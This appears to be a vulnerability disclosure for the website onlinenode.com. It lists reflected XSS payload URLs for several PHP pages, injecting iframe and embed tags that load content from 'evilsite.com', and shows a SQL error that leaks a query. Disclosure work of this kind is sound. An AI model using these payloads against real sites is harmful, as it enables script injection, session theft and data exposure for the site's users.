Onlinenode.com Homepage: http://www.onlinenode.com Effected files: node_category.php node_article.php webpage.php guestbook.php journal.php pictures.php chatroom.php --------------------------- XSS Vuln via node_category.php: One way to archive this is to use black tags with an open ended iframe tag: http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1";>'>"<iframe%20src=http://evilsite.com/scriptlet.html%20< Another way would be to use <embed> tags, since using flash could also create a XSS attack: http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<""> -------------------------------------------- XSS Vuln via node_article.php: One way to archive this is to use black tags with an open ended iframe tag: http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/scriptlet.html%20< Another way would be to use <embed> tags, since using flash could also create a XSS attack: http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<""> ------------------------------------------- Possible SQL injection due to with query error: http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=19' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol. somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND host != 'dsl-127-0-0.lol.somehost.com' We can see from the above query, a few table names as well as our IP + hostmask. XSS Vuln in webpage.php: http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=2";>'><iframe%20src=http://evilsite.com/scriptlet.html < Again, same as above the <embed> tags also work for flash. ------------------------------------------ XSS Vulnerability via guestbook.php: http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id_user=18";>'><iframe%20src=http://evilsite.com/scriptlet.html%20< Again, same as above the <embed> tags also work for flash. ----------------------------------------- XSS Vulnerability via journal.php: http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20< Again, same as above the <embed> tags also work for flash. --------------------------------------- XSS Vuln via pictures.php: http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_user=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20< Again, same as above the <embed> tags also work for flash. ---------------------------------------- XSS Vuln via mb_thread.php when viewing threads: http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id_thread=0";>'><iframe%20src=http://evilsite.com/scriptlet.html%20< Again, same as above the <embed> tags also work for flash. ------------------------------------- XSS Vuln via chatroom.php: http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_room=";>'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=24&button.y=14 Again, <embed> tags work here too.
